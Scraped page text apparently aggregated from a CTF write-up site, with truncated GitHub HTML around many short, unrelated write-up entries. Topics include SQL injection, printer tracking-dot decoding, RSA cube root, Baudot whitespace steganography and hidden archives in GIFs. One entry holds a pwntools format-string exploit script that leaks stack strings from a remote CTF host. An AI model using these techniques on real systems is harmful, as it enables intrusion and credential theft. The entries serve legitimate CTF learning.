<div style="visibility:hidden;" data-view-component="true" class="UnderlineNav-actions js-responsive-underlinenav-overflow position-absolute pr-3 pr-md-4 pr-lg-5 right-0"> <details data-view-component="true" class="details-overlay details-reset position-relative"> <summary role="button" data-view-component="true"> <div class="UnderlineNav-item mr-0 border-0"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-kebab-horizontal"> <path d="M8 9a1.5 1.5 0 100-3 1.5 1.5 0 000 3zM1.5 9a1.5 1.5 0 100-3 1.5 1.5 0 000 3zm13 0a1.5 1.5 0 100-3 1.5 1.5 0 000 3z"></path></svg> <span>More</span> </div></summary> <div data-view-component="true"> <details-menu role="menu" data-view-component="true" class="dropdown-menu dropdown-menu-sw"> Code Issues Pull requests Actions Projects Wiki Security Insights
</details-menu></div></details></div></nav> </div>
<div class="clearfix new-discussion-timeline container-xl px-3 px-md-4 px-lg-5"> <div id="repo-content-pjax-container" class="repository-content " >
<div> <div class="file-navigation mb-3 d-flex flex-items-start"> <div class="position-relative"> <details class="details-reset details-overlay mr-0 mb-0 " id="branch-select-menu"> <summary class="btn css-truncate" data-hotkey="w" title="Switch branches or tags"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-branch"> <path fill-rule="evenodd" d="M11.75 2.5a.75.75 0 100 1.5.75.75 0 000-1.5zm-2.25.75a2.25 2.25 0 113 2.122V6A2.5 2.5 0 0110 8.5H6a1 1 0 00-1 1v1.128a2.251 2.251 0 11-1.5 0V5.372a2.25 2.25 0 111.5 0v1.836A2.492 2.492 0 016 7h4a1 1 0 001-1v-.628A2.25 2.25 0 019.5 3.25zM4.25 12a.75.75 0 100 1.5.75.75 0 000-1.5zM3.5 3.25a.75.75 0 111.5 0 .75.75 0 01-1.5 0z"></path></svg> <span>main</span> <span></span> </summary>
<div class="SelectMenu"> <div class="SelectMenu-modal"> <header class="SelectMenu-header"> <span>Switch branches/tags</span> <button class="SelectMenu-closeButton" type="button" data-toggle-for="branch-select-menu"><svg aria-label="Close menu" aria-hidden="false" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path fill-rule="evenodd" d="M3.72 3.72a.75.75 0 011.06 0L8 6.94l3.22-3.22a.75.75 0 111.06 1.06L9.06 8l3.22 3.22a.75.75 0 11-1.06 1.06L8 9.06l-3.22 3.22a.75.75 0 01-1.06-1.06L6.94 8 3.72 4.78a.75.75 0 010-1.06z"></path></svg></button> </header>
<input-demux data-action="tab-container-change:input-demux#storeInput tab-container-changed:input-demux#updateInput"> <tab-container class="d-flex flex-column js-branches-tags-tabs" style="min-height: 0;"> <div class="SelectMenu-filter"> <input data-target="input-demux.source" id="context-commitish-filter-field" class="SelectMenu-input form-control" aria-owns="ref-list-branches" data-controls-ref-menu-id="ref-list-branches" autofocus autocomplete="off" aria-label="Filter branches/tags" placeholder="Filter branches/tags" type="text" > </div>
<div class="SelectMenu-tabs" role="tablist" data-target="input-demux.control" > <button class="SelectMenu-tab" type="button" role="tab" aria-selected="true">Branches</button> <button class="SelectMenu-tab" type="button" role="tab">Tags</button> </div>
<div role="tabpanel" id="ref-list-branches" data-filter-placeholder="Filter branches/tags" class="d-flex flex-column flex-auto overflow-auto" tabindex=""> <ref-selector type="branch" data-targets="input-demux.sinks" data-action=" input-entered:ref-selector#inputEntered tab-selected:ref-selector#tabSelected focus-list:ref-selector#focusFirstListMember " query-endpoint="/0xM4hm0ud/CTF-Writeups/refs" cache-key="v0:1629839176.279113" current-committish="bWFpbg==" default-branch="bWFpbg==" name-with-owner="MHhNNGhtMHVkL0NURi1Xcml0ZXVwcw==" prefetch-on-mouseover >
<template data-target="ref-selector.fetchFailedTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Could not load branches</div> </template>
<template data-target="ref-selector.noMatchTemplate"> <div class="SelectMenu-message">Nothing to show</div></template>
<div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list " style="max-height: 330px" data-pjax="#repo-content-pjax-container"> <div class="SelectMenu-loading pt-3 pb-0" aria-label="Menu is loading"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> </div> </div>
<template data-target="ref-selector.itemTemplate"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path fill-rule="evenodd" d="M13.78 4.22a.75.75 0 010 1.06l-7.25 7.25a.75.75 0 01-1.06 0L2.22 9.28a.75.75 0 011.06-1.06L6 10.94l6.72-6.72a.75.75 0 011.06 0z"></path></svg> <span>{{ refName }}</span> <span>default</span> </template>
<footer class="SelectMenu-footer">View all branches</footer> </ref-selector>
</div>
<div role="tabpanel" id="tags-menu" data-filter-placeholder="Find a tag" class="d-flex flex-column flex-auto overflow-auto" tabindex="" hidden> <ref-selector type="tag" data-action=" input-entered:ref-selector#inputEntered tab-selected:ref-selector#tabSelected focus-list:ref-selector#focusFirstListMember " data-targets="input-demux.sinks" query-endpoint="/0xM4hm0ud/CTF-Writeups/refs" cache-key="v0:1629839176.279113" current-committish="bWFpbg==" default-branch="bWFpbg==" name-with-owner="MHhNNGhtMHVkL0NURi1Xcml0ZXVwcw==" >
<template data-target="ref-selector.fetchFailedTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Could not load tags</div> </template>
<template data-target="ref-selector.noMatchTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Nothing to show</div> </template>
<template data-target="ref-selector.itemTemplate"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path fill-rule="evenodd" d="M13.78 4.22a.75.75 0 010 1.06l-7.25 7.25a.75.75 0 01-1.06 0L2.22 9.28a.75.75 0 011.06-1.06L6 10.94l6.72-6.72a.75.75 0 011.06 0z"></path></svg> <span>{{ refName }}</span> <span>default</span> </template>
<div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list" style="max-height: 330px" data-pjax="#repo-content-pjax-container"> <div class="SelectMenu-loading pt-3 pb-0" aria-label="Menu is loading"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> </div> </div> <footer class="SelectMenu-footer">View all tags</footer> </ref-selector> </div> </tab-container> </input-demux> </div></div>
</details>
</div>
<div class="flex-1 mx-2 flex-self-center f4"> <div class="d-none d-sm-block"> <span><span><span>CTF-Writeups</span></span></span><span>/</span><span><span>TamilCTF</span></span><span>/</span><span><span>Crypto</span></span><span>/</span>secret sharing<span>/</span> </div> </div>
<div class="d-flex"> Go to file </div> </div>
<div class="f4 mt-3 mb-3 d-sm-none"><span><span><span>CTF-Writeups</span></span></span><span>/</span><span><span>TamilCTF</span></span><span>/</span><span><span>Crypto</span></span><span>/</span>secret sharing<span>/</span></div>
<div class="Box mb-3"> <div class="Box-header position-relative"> <h2 class="sr-only">Latest commit</h2> <div class="js-details-container Details d-flex rounded-top-1 flex-items-center flex-wrap" data-issue-and-pr-hovercards-enabled> <include-fragment src="/0xM4hm0ud/CTF-Writeups/tree-commit/5faa6be3bf621dedae87b3ed4df6a094896d7b42/TamilCTF/Crypto/secret%20sharing" class="d-flex flex-auto flex-items-center" aria-busy="true" aria-label="Loading latest commit"> <div class="Skeleton avatar avatar-user flex-shrink-0 ml-n1 mr-n1 mt-n1 mb-n1" style="width:24px;height:24px;"></div> <div class="Skeleton Skeleton--text col-5 ml-3"> </div></include-fragment> <div class="flex-shrink-0"> <h2 class="sr-only">Git stats</h2> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-history"> <path fill-rule="evenodd" d="M1.643 3.143L.427 1.927A.25.25 0 000 2.104V5.75c0 .138.112.25.25.25h3.646a.25.25 0 00.177-.427L2.715 4.215a6.5 6.5 0 11-1.18 4.458.75.75 0 10-1.493.154 8.001 8.001 0 101.6-5.684zM7.75 4a.75.75 0 01.75.75v2.992l2.028.812a.75.75 0 01-.557 1.392l-2.5-1A.75.75 0 017 8.25v-3.5A.75.75 0 017.75 4z"></path></svg> <span> History </span> </div> </div> </div> <h2 id="files" class="sr-only">Files</h2>
<include-fragment src="/0xM4hm0ud/CTF-Writeups/file-list/main/TamilCTF/Crypto/secret%20sharing"> Permalink
<div data-view-component="true" class="include-fragment-error flash flash-error flash-full py-2"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path fill-rule="evenodd" d="M8.22 1.754a.25.25 0 00-.44 0L1.698 13.132a.25.25 0 00.22.368h12.164a.25.25 0 00.22-.368L8.22 1.754zm-1.763-.707c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0114.082 15H1.918a1.75 1.75 0 01-1.543-2.575L6.457 1.047zM9 11a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.25a.75.75 0 00-1.5 0v2.5a.75.75 0 001.5 0v-2.5z"></path></svg> Failed to load latest commit information.
</div> <div class="js-details-container Details"> <div role="grid" aria-labelledby="files" class="Details-content--hidden-not-important js-navigation-container js-active-navigation-container d-block" data-pjax> <div class="sr-only" role="row"> <div role="columnheader">Type</div> <div role="columnheader">Name</div> <div role="columnheader" class="d-none d-md-block">Latest commit message</div> <div role="columnheader">Commit time</div> </div> <div role="row" class="Box-row Box-row--focus-gray p-0 d-flex js-navigation-item" > <div role="rowheader" class="flex-auto min-width-0 col-md-2"> <span>. .</span> </div> <div role="gridcell" class="d-none d-md-block"></div> <div role="gridcell"></div> </div>
<div role="row" class="Box-row Box-row--focus-gray py-2 d-flex position-relative js-navigation-item "> <div role="gridcell" class="mr-3 flex-shrink-0" style="width: 16px;"> <svg aria-label="File" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-file color-icon-tertiary"> <path fill-rule="evenodd" d="M3.75 1.5a.25.25 0 00-.25.25v11.5c0 .138.112.25.25.25h8.5a.25.25 0 00.25-.25V6H9.75A1.75 1.75 0 018 4.25V1.5H3.75zm5.75.56v2.19c0 .138.112.25.25.25h2.19L9.5 2.06zM2 1.75C2 .784 2.784 0 3.75 0h5.086c.464 0 .909.184 1.237.513l3.414 3.414c.329.328.513.773.513 1.237v8.086A1.75 1.75 0 0112.25 15h-8.5A1.75 1.75 0 012 13.25V1.75z"></path></svg> </div>
<div role="rowheader" class="flex-auto min-width-0 col-md-2 mr-3"> <span>flag.py</span> </div>
<div role="gridcell" class="flex-auto min-width-0 d-none d-md-block col-5 mr-3" > <div class="Skeleton Skeleton--text col-7"> </div> </div>
<div role="gridcell" class="color-fg-muted text-right" style="width:100px;"> <div class="Skeleton Skeleton--text"> </div> </div>
</div> </div> </div>
</include-fragment>
</div>
</div>
</div></div>
</main> </div>
</div>
<div class="footer container-xl width-full p-responsive" role="contentinfo"> <div class="position-relative d-flex flex-row-reverse flex-lg-row flex-wrap flex-lg-nowrap flex-justify-center flex-lg-justify-between pt-6 pb-2 mt-6 f6 color-fg-muted border-top color-border-muted "> © 2021 GitHub, Inc. Terms Privacy Security Status Docs
<svg aria-hidden="true" height="24" viewBox="0 0 16 16" version="1.1" width="24" data-view-component="true" class="octicon octicon-mark-github"> <path fill-rule="evenodd" d="M8 0C3.58 0 0 3.58 0 8c0 3.54 2.29 6.53 5.47 7.59.4.07.55-.17.55-.38 0-.19-.01-.82-.01-1.49-2.01.37-2.53-.49-2.69-.94-.09-.23-.48-.94-.82-1.13-.28-.15-.68-.52-.01-.53.63-.01 1.08.58 1.23.82.72 1.21 1.87.87 2.33.66.07-.52.28-.87.51-1.07-1.78-.2-3.64-.89-3.64-3.95 0-.87.31-1.59.82-2.15-.08-.2-.36-1.02.08-2.12 0 0 .67-.21 2.2.82.64-.18 1.32-.27 2-.27.68 0 1.36.09 2 .27 1.53-1.04 2.2-.82 2.2-.82.44 1.1.16 1.92.08 2.12.51.56.82 1.27.82 2.15 0 3.07-1.87 3.75-3.65 3.95.29.25.54.73.54 1.48 0 1.07-.01 1.93-.01 2.2 0 .21.15.46.55.38A8.013 8.013 0 0016 8c0-4.42-3.58-8-8-8z"></path></svg> Contact GitHub Pricing API Training Blog About </div> <div class="d-flex flex-justify-center pb-6"> <span></span> </div></div>
<div id="ajax-error-message" class="ajax-error-message flash flash-error" hidden> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path fill-rule="evenodd" d="M8.22 1.754a.25.25 0 00-.44 0L1.698 13.132a.25.25 0 00.22.368h12.164a.25.25 0 00.22-.368L8.22 1.754zm-1.763-.707c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0114.082 15H1.918a1.75 1.75 0 01-1.543-2.575L6.457 1.047zM9 11a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.25a.75.75 0 00-1.5 0v2.5a.75.75 0 001.5 0v-2.5z"></path></svg> <button type="button" class="flash-close js-ajax-error-dismiss" aria-label="Dismiss error"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path fill-rule="evenodd" d="M3.72 3.72a.75.75 0 011.06 0L8 6.94l3.22-3.22a.75.75 0 111.06 1.06L9.06 8l3.22 3.22a.75.75 0 11-1.06 1.06L8 9.06l-3.22 3.22a.75.75 0 01-1.06-1.06L6.94 8 3.72 4.78a.75.75 0 010-1.06z"></path></svg> </button> You can’t perform that action at this time. </div>
<div class="js-stale-session-flash flash flash-warn flash-banner" hidden > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path fill-rule="evenodd" d="M8.22 1.754a.25.25 0 00-.44 0L1.698 13.132a.25.25 0 00.22.368h12.164a.25.25 0 00.22-.368L8.22 1.754zm-1.763-.707c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0114.082 15H1.918a1.75 1.75 0 01-1.543-2.575L6.457 1.047zM9 11a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.25a.75.75 0 00-1.5 0v2.5a.75.75 0 001.5 0v-2.5z"></path></svg> <span>You signed in with another tab or window. Reload to refresh your session.</span> <span>You signed out in another tab or window. Reload to refresh your session.</span> </div> <template id="site-details-dialog"> <details class="details-reset details-overlay details-overlay-dark lh-default color-fg-default hx_rsm" open> <summary role="button" aria-label="Close dialog"></summary> <details-dialog class="Box Box--overlay d-flex flex-column anim-fade-in fast hx_rsm-dialog hx_rsm-modal"> <button class="Box-btn-octicon m-0 btn-octicon position-absolute right-0 top-0" type="button" aria-label="Close dialog" data-close-dialog> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path fill-rule="evenodd" d="M3.72 3.72a.75.75 0 011.06 0L8 6.94l3.22-3.22a.75.75 0 111.06 1.06L9.06 8l3.22 3.22a.75.75 0 11-1.06 1.06L8 9.06l-3.22 3.22a.75.75 0 01-1.06-1.06L6.94 8 3.72 4.78a.75.75 0 010-1.06z"></path></svg> </button> <div class="octocat-spinner my-6 js-details-dialog-spinner"></div> </details-dialog> </details></template>
<div class="Popover js-hovercard-content position-absolute" style="display: none; outline: none;" tabindex="0"> <div class="Popover-message Popover-message--bottom-left Popover-message--large Box color-shadow-large" style="width:360px;"> </div></div>
<template id="snippet-clipboard-copy-button"> <div class="zeroclipboard-container position-absolute right-0 top-0"> <clipboard-copy aria-label="Copy" class="ClipboardButton btn js-clipboard-copy m-2 p-0 tooltipped-no-delay" data-copy-feedback="Copied!" data-tooltip-direction="w"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-copy js-clipboard-copy-icon m-2"> <path fill-rule="evenodd" d="M0 6.75C0 5.784.784 5 1.75 5h1.5a.75.75 0 010 1.5h-1.5a.25.25 0 00-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 00.25-.25v-1.5a.75.75 0 011.5 0v1.5A1.75 1.75 0 019.25 16h-7.5A1.75 1.75 0 010 14.25v-7.5z"></path><path fill-rule="evenodd" d="M5 1.75C5 .784 5.784 0 6.75 0h7.5C15.216 0 16 .784 16 1.75v7.5A1.75 1.75 0 0114.25 11h-7.5A1.75 1.75 0 015 9.25v-7.5zm1.75-.25a.25.25 0 00-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 00.25-.25v-7.5a.25.25 0 00-.25-.25h-7.5z"></path></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check js-clipboard-check-icon color-text-success d-none m-2"> <path fill-rule="evenodd" d="M13.78 4.22a.75.75 0 010 1.06l-7.25 7.25a.75.75 0 01-1.06 0L2.22 9.28a.75.75 0 011.06-1.06L6 10.94l6.72-6.72a.75.75 0 011.06 0z"></path></svg> </clipboard-copy> </div></template>
</body></html>
|
This was a SQL injection web vulnerability. Could be easily confirmed by using a always true condition chained in the input.Next we need to find the database which was SQLLite.Followed by the table name as "taxi".
Once these are done, we can easily add a union query to get the required details to form the flag. Read the writeup for detailed information. |
Writeup URL: [GitHub](https://infosecstreams.github.io/csaw21/mic/)# mic
Writeup by: [GoProSlowYo](https://github.com/GoProSlowYo)
Team: [OnlyFeet](https://ctftime.org/team/144644)
Writeup URL: [GitHub](https://infosecstreams.github.io/csaw21/mic/)
----
```textMy Epson InkJet printer is mysteriously printing blank pages. Is it trying to tell me something?```
## Initial Research
The text seems to reference the printer "telling" us something. This 'something' is [`MIC`](https://en.wikipedia.org/wiki/Machine_Identification_Code)'s in the printer page.
> Tiny dots are embedded on printouts by modern printers. Markings like these were used to trace [NSA documents leaked to The Intercept by Reality Winner](http://www.bbc.com/future/story/20170607-why-printers-add-secret-tracking-dots).
 (source: https://upload.wikimedia.org/wikipedia/commons/8/8e/HP_Color_Laserjet_3700_schutz_g.jpg)
## Getting the Flag from the Printed Pages
First we need to quickly install some dependencies:
```shellgit clone https://github.com/dfd-tud/dedapushd deda && pip3 install --user deda && popdsudo apt install poppler-utils```
Then, we wrote a quick one liner to dump the flag:
```shell$ pdftoppm scan.pdf scan -png; for x in {01..34}; do echo -n $(python3 -c "print(chr($(deda_parse_print scan-$x.png | grep serial | cut -d '-' -f2 | sed 's/^0*//')))"); doneflag{watchoutforthepoisonedcoffee}```
\
## Victory
Submit the flag and claim the points:
**flag{watchoutforthepoisonedcoffee}** |
This was the second RSA challenge and was a simple cube root attack. The premise of the challenge is that the exponent used for encryption is very small as compared to the public key modulus. So the effect of mod(n) in RSA encryption has no effect. Read the writeup for detailed explanation. |
The first thing we noticed when we opened the file were the many empty lines below the sentence. After a closer look, it turned out that there were tab spaces in many of the seemingly empty lines.
The first thought was that the tabs and line feeds represent a 01 bit pattern. But unfortunately a simple replacement of the tabs with a 1 and the line feeds with a 0 did not bring any result for the time being.
Another approach was the offered sentence. This was a quote from John le Carré a former MI5 and MI6 agent. We spent a lot of time to collect more information about John le Carré etc.. Until the first clue appeared saying not to focus on the sentence.
So we started to rethink the 01 bit pattern approach. What finally led to the solution of the challenge.
We took the hexdump of the file and replaced all 0A hex values (tab spaces) with 0 and all 09 hex values (line feeds) with 1. Then we tried to convert them by different bit patterns from 3-bit to 8-bit into ASCII characters. Still without success. 
On the way brought us the hint that the flag consists only of capital letters. At the same time the hint appeared that it is a 5 bit encoding. So we searched a bit and found the Baudot code. This code was used for telegraphs. A conversion with a Baudot converter brought the following result. 
A bit confusing but after a closer look a pattern appeared. A kind of alphabet. And already we had the flag in our hands.
**TMCTF{PUNCH.CARDS.ARE.DEAD.NOW}** |
Its a image forensics challenge wherein a zip file is hidden inside a gif file. We need to find the zip file and also another password to the pdf present inside the zip which contains the required details. Read the original writeup for more detailed information. |
The web page asked me to guess the flag. If I click `Guess the flag` button with input `this_is_the_flag?` will send POST data that look like this:```json{"this_is_the_flag?":true} ```This is weird. Why the input is a JSON key instead value? So the server must use the flag as a JSON key
Let see what if I send empty data maybe the server will show some error message.```consolecurl "http://34.84.69.72:34705/" -X POST{"statusCode":500,"error":"Internal Server Error","message":"Cannot read property 'TSGCTF{M4king_We6_ch4l1en9e_i5_1ik3_playing_Jenga}' of null"}```I got the flag! |
# Destructinator
Author: [roerohan](https://github.com/roerohan)
## Exploit
In this challenge, there is a format string vulnerability, since the `printf()` function directly accepts user input. The user can enter strings like `%s`, `%x`, `%p`, to leak items from the stack.
The password was stored as a local variable in the function, therefore it must be present on the stack. We run the following script to leak the stack.
```pyfrom pwn import *host = 'overly.uniquename.xyz'port = 8880
stack = []
for i in range(1, 100): try: p = remote(host, port) print(p.recv(1024)) p.sendline('%{}$s'.format(i)) print(p.recvline()) y = p.recvline()
stack.append(y) print(y) print(stack) except: pass```
This gives an output like the following
```py[b'(null)\n', b'\xd6.y\xe4\xfd\x7f\n', b'(null)\n', b'I\x89\xc0H\x85\xc0\x0f\x84\xc2\n', b'%11$s\n', b'1_l0v3_c4ts\n', b'H\x8d\x05\x88\xf4\x02\n', b'(null)\n', b'I\x83\xc5\x02A\x0f\xb7m\xfeI\x89\xc6L\x8dx\xfeM\x85\xe4u\x13\xeb\xcc\x0f\x1f@\n', b'(null)\n', b'\n', b'(null)\n', b'1_l0v3_c4ts\n', b'\n', b'\x85\xc0y\xe5H\xc7\xc0\xc0\xff\xff\xffH\x8bs\x08H\x8d\rb\xcf\x02\n'...]```
We can see the string `1_l0v3_c4ts` in the array above, which is actually the password for the challenge. Entering this returns the flag:
```dsc{7h3_p20ff3502_7h4nk5_y0u}``` |
This was a regular packet capture analysis challenge that required analysis using Wire shark tool. Some smart filtering of packets and step by step analysis gives us the flag easily. Check the writeup for more details. |
An enigma cipher based challenge. The cipher text clearly showed that it was blocks of enigma ciphertext. The real challenge was to find the enigma cipher parameters which was hidden inside a password protected pdf whose password needs to be cracked using John The Ripper. Read the original writeup below for detailed steps. |
# The Missing Journalist - Forensics
Author - [Sanjay Baskaran](http://github.com/sanjaybaskaran01)
Requirements: Binwalk,exiftool
(If any of the images aren't loading, please check the original [writeup](https://github.com/csivitu/CTF-Write-ups/tree/master/Deconstruct.f/Forensics/The%20Missing%20Journalist))
---## Source
```It's been a year since you've been a private investigator and you've made quite a name for yourself. You sit there thinking about all the weird cases you've managed in the last year when suddenly, a person bursts through your door saying something about her missing husband. You finally gather that her husband, a renowned journalist who was tracking down a serial killer has suddenly gone missing since last night. The hysterical wife has provided you with a picture of how he looks like. Do you take the case?```
## Exploit
Running the command `strings the_journalist.gif` gave us

As you can see there was a hidden directory `message/`, We used binwalk to extract the hidden files in the GIF. The PDF present inside was password protected.

Running exiftool on the GIF gave us

which seemed to be a base64 encoded string

Decoding it got us "`h3_w45_l45t_s33n_4t_th4_m0v135`" and voila! this was the password of the PDF and that finally gave us..

The flag:
```dsc{1_f0und_h1m_4nd_h35_my_fr13nd}``` |
This was partly crypto and partly a reversing challenge. We are provided with an encrypted message and the encrypter along with the cipher file. Our goal is to decrypt with the available information. The main challenge was to understand the encrypter and come up with a decrypter which would reverse the effect of the encrypter. A detailed writeup is available in the below link. |
A multi part forensic challenge, that involved quite a lot of thinking. I have come up with a detailed writeup including the thought process that went into the challenge. Head straight to the original writeup below. |
<html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark"> <head> <meta charset="utf-8"> <link rel="dns-prefetch" href="https://github.githubassets.com"> <link rel="dns-prefetch" href="https://avatars.githubusercontent.com"> <link rel="dns-prefetch" href="https://github-cloud.s3.amazonaws.com"> <link rel="dns-prefetch" href="https://user-images.githubusercontent.com/"> <link rel="preconnect" href="https://github.githubassets.com" crossorigin> <link rel="preconnect" href="https://avatars.githubusercontent.com">
<link crossorigin="anonymous" media="all" integrity="sha512-L06pZD/4Yecj8D8pY5aYfA7oKG6CI8/hlx2K9ZlXOS/j5TnYEjrusaVa9ZIb9O3/tBHmnRFLzaC1ixcafWtaAg==" rel="stylesheet" href="https://github.githubassets.com/assets/light-2f4ea9643ff861e723f03f296396987c.css" /><link crossorigin="anonymous" media="all" integrity="sha512-xcx3R1NmKjgOAE2DsCHYbus068pwqr4i3Xaa1osduISrxqYFi3zIaBLqjzt5FM9VSHqFN7mneFXK73Z9a2QRJg==" rel="stylesheet" href="https://github.githubassets.com/assets/dark-c5cc774753662a380e004d83b021d86e.css" /><link data-color-theme="dark_dimmed" crossorigin="anonymous" media="all" integrity="sha512-xlDV9el7Cjd+KTSbwspx+c8its28uxn++hLZ9pqYYo1zOVcpLPlElTo42iA/8gV3xYfLvgqRZ3dQPxHCu4UaOQ==" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_dimmed-c650d5f5e97b0a377e29349bc2ca71f9.css" /><link data-color-theme="dark_high_contrast" crossorigin="anonymous" media="all" integrity="sha512-jkzjbgytRSAyC4EMcrdpez+aJ2CROSpfemvgO2TImxO6XgWWHNG2qSr2htlD1SL78zfuPXb+iXaVTS5jocG0DA==" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_high_contrast-8e4ce36e0cad4520320b810c72b7697b.css" /><link data-color-theme="dark_colorblind" crossorigin="anonymous" media="all" integrity="sha512-FzS8HhJ7XSHmx/dBll4FYlvu+8eivvb7jnttZy9KM5plsMkgbEghYKJszrFFauqQvv7ezYdbk7v/d8UtdjG9rw==" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_colorblind-1734bc1e127b5d21e6c7f741965e0562.css" /><link data-color-theme="light_colorblind" crossorigin="anonymous" media="all" integrity="sha512-IpkvxndMpMcO4paMJl83lYTcy18jv2jqG7mHZnTfr9HRV09iMhuQ/HrE+4mQO2nshL7ZLejO1OiVNDQkyVFOCA==" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_colorblind-22992fc6774ca4c70ee2968c265f3795.css" /> <link crossorigin="anonymous" media="all" integrity="sha512-4hzfg/znP4UxIOUt/r3SNYEZ6jBPJIS6PH4VC26tE0Nd4xAymMC3KXDaC9YITfG4fhyfxuB1YnDHo1H2iUwsfg==" rel="stylesheet" href="https://github.githubassets.com/assets/frameworks-e21cdf83fce73f853120e52dfebdd235.css" /> <link crossorigin="anonymous" media="all" integrity="sha512-sT0AyFLl78shyaRWRXOw8uwRSnR+7tURIXoJwVYadATkrqeWfze5y/tOu8MS1mbzUKl6pgLjfEdT+U8bwBJHfQ==" rel="stylesheet" href="https://github.githubassets.com/assets/behaviors-b13d00c852e5efcb21c9a4564573b0f2.css" /> <link crossorigin="anonymous" media="all" integrity="sha512-jdtbQr5ZSKZqID/c80i87Ml+YyEhYVd5sF9szeR+Xuvbfhi4yLJbEsSllzk0XRzcbWqD4tDtshhRo5IuJx4Mzw==" rel="stylesheet" href="https://github.githubassets.com/assets/github-8ddb5b42be5948a66a203fdcf348bcec.css" />
<script crossorigin="anonymous" defer="defer" integrity="sha512-/0zs/So9AxtDONKx324yW8s62PoPMx4Epxmk1aJmMgIYIKUkQg4YqlZQ06B4j0tSXQcUB8/zWiIkhLtVEozU/w==" type="application/javascript" src="https://github.githubassets.com/assets/environment-ff4cecfd.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-8p4kkx6e3xBq1g3NP0O3/AW/aiTQ+VRxYencIeMD8crx7AEwrOTV+XOL/UE8cw4vEvkoU/zzLEZ9cud0jFfI4w==" type="application/javascript" src="https://github.githubassets.com/assets/chunk-frameworks-f29e2493.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-slE3Aa2Duzwgju0UbTfes+w5slmaEOhXwom+Ev+pPsxxOpeh2CGZqfriJGr6pkhTZX+ffOTTYl3GnSLtp7AkJw==" type="application/javascript" src="https://github.githubassets.com/assets/chunk-vendor-b2513701.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-ZDU7IsI6lFo4eeBuqkrh/Htsa12ZYOi44uBhKqG0LyV6XHM502iJjjsIVnmtmNXrrC9oGMf2O5i57Bx4lwGsXw==" type="application/javascript" src="https://github.githubassets.com/assets/behaviors-64353b22.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-ODZJzCJpaOfusrIka5QVZQcPiO9LBGyrrMYjhhJWSLuCN5WbZ5xiEiiOPOKVu71dqygyRdB2TY7AKPA1J5hqdg==" type="application/javascript" data-module-id="./chunk-unveil.js" data-src="https://github.githubassets.com/assets/chunk-unveil-383649cc.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-emPgUbSwW9ezLCgRnTE7n4fbbfc/MqEEDHmnkmG61dTyjWKHTYKN4wN3OPS7SY0fwmSJ8mB5+gng2nZw4/HsUg==" type="application/javascript" data-module-id="./chunk-animate-on-scroll.js" data-src="https://github.githubassets.com/assets/chunk-animate-on-scroll-7a63e051.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-pWX6rMbTl/ERAhhtbAyXiJzoXFr91jp/mRy2Xk4OpAId3aVFI2X+yI8X3mhbf985F5BRHamuRx20kG62nRtSLQ==" 